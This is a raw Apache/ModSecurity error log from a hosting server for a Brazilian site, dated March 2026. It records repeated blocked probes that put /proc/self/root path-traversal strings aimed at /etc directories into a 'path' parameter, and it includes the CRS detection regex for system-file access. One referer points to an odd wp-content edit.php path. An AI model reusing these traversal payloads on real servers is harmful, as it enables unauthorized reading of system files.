"abiq2o6lpbStxTqkSkuYVwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:04.233800 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:50082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq3NSswJuvopo3lOiTyQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:04.643109 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.243.203:34872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq3FajLEzk2WiQ-11FzAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:08.303654 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:50086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq4KTCbgAP5jq5TehdlwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:08.947915 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.243.203:37446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq4Er9dMAiw-8KANN7xgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:11.045097 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:50738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq46QpVkWug9HeOt9j5gAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:23.045904 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50452] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:14:25.696654 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:54300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq8Y6lpbStxTqkSkuYWwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:26.271840 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.243.203:37454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq8s_BxrYCr4hPDw8dHgAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:27.201091 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:54300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq846lpbStxTqkSkuYXgAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:28.925478 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:51620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq9LysWC90G-1nBrB2rwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:29.401822 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:53846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq9bysWC90G-1nBrB2sAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:31.103773 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.243.203:60148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiq98_BxrYCr4hPDw8dIAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:44.061426 2026] [proxy_fcgi:error] [pid 10772:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50988] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:14:44.258598 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:51626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirBEr9dMAiw-8KANN70AAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:48.071262 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:60156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirCFajLEzk2WiQ-11F1QAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:14:51.663823 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:54908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirC6TCbgAP5jq5TehdoAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:14:53.364097 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:56620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirDdSswJuvopo3lOiTzgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:03.002542 2026] [log_config:warn] [pid 21806:tid 140411658000128] (32)Broken pipe: [client 69.197.179.242:44182] AH00646: Error writing to |/etc/httpd/logger, referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697
[Mon Mar 16 22:15:03.340066 2026] [ssl:warn] [pid 6229:tid 140412349433728] AH01909: bandeirantesbomb3.hospedagemdesites.ws:443:0 server certificate does NOT include an ID which matches the server name
[Mon Mar 16 22:15:05.846624 2026] [log_config:warn] [pid 15061:tid 140411658000128] (32)Broken pipe: [client 74.7.241.46:56636] AH00646: Error writing to |/etc/httpd/logger, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib
[Mon Mar 16 22:15:06.357876 2026] [proxy_fcgi:error] [pid 15061:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51610] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:15:06.358192 2026] [log_config:warn] [pid 15061:tid 140411548894976] (32)Broken pipe: [client 179.188.53.243:51610] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:15:06.550180 2026] [log_config:warn] [pid 29802:tid 140411699963648] (32)Broken pipe: [client 74.7.243.203:59840] AH00646: Error writing to |/etc/httpd/logger, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt
[Mon Mar 16 22:15:07.575824 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.241.46:55426] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirGwQohV2v-7oj5HG81AAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:08.846745 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:42726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirHAQohV2v-7oj5HG81gAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:15:18.763378 2026] [:error] [pid 2305:tid 140411691570944] [client 74.7.241.46:42732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirJgQohV2v-7oj5HG84AAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:28.000695 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:43446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirL6BJNF7axNlVR0W6WwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:15:28.057834 2026] [proxy_fcgi:error] [pid 10831:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52352] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:15:28.058135 2026] [log_config:warn] [pid 10831:tid 140411741927168] (32)Broken pipe: [client 179.188.53.243:52352] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:15:28.789001 2026] [:error] [pid 2304:tid 140411725141760] [client 74.7.243.203:44870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirMMh3JZxwdBQwPYGyVQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
